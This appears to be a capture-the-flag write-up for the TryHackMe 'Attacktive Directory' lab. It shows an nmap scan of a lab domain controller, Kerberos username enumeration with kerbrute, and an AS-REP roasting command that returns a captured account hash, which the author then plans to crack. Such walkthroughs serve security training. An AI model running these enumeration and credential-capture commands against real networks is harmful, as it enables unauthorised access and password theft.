https://tryhackme.com/room/attacktivedirectory

Task 2 - Setup

Active Directory must have

apt install bloodhound neo4j

Task 3 - Welcome to Attacktive Directory

To enumerate 139/445 ports

enum4linux

nmap result

┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 10.10.21.163       

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-23 13:25:22Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-06-22T13:08:06
|_Not valid after:  2022-12-22T13:08:06
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: **THM-AD**
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-06-23T13:25:36+00:00
|_ssl-date: 2022-06-23T13:25:45+00:00; 0s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-06-23T13:25:37
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Task 4 - Enumerating Users via Kerberos

Kerbrute - https://github.com/ropnop/kerbrute/releases

wget <https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64>

Enumerate username with kerbrute , first adding the IP and spookysec.local to /etc/hosts

./kerbrute_linux_amd64 --dc spookysec.local -d spookysec.local userenum userlist.txt -t 100

Task 5 - Abusing Kerberos

Using impacket-GetNPUsersto query ASReproastable accounts from the Key Distribution Center.

impacket-GetNPUsers -dc-ip spookysec.local spookysec.local/svc-admin -no-pass

Output of the ASReproastable account hash:

[email protected]:a011659c2336c191997b7e7d142f07e0$6ce1514730aaa07aa23e37cf8ec2067a1bbfd0d089e7841a16f991bf55c447e97f1f1510e4f9523b2fa8b7d8b87b8239b82db49a1eb1357eab3c1c3ff1a94129c5f1268463dfbf76b9dc85cbbedfdde6bb2fcb90b8f2bcd5c3262d86da1511bfb990e33b11b22553051babce61b969cff0bcb665252ff46a98daeb31675182d31b4df0af024c1f13b20896b1715062cac36c820f801e2823ace0770ef5c5ea30dff5fd01f68014132e6b4a0a535e92605c23aff389ef2018b5779c422ba028c8aef44ff297b95f4686d5535c73bc003f1d6f4e26f4e3b49c6df1fa0193ce33411bd7f8e0b52c308e3359be803ccf6b7a8a6e

Now going to hashcat it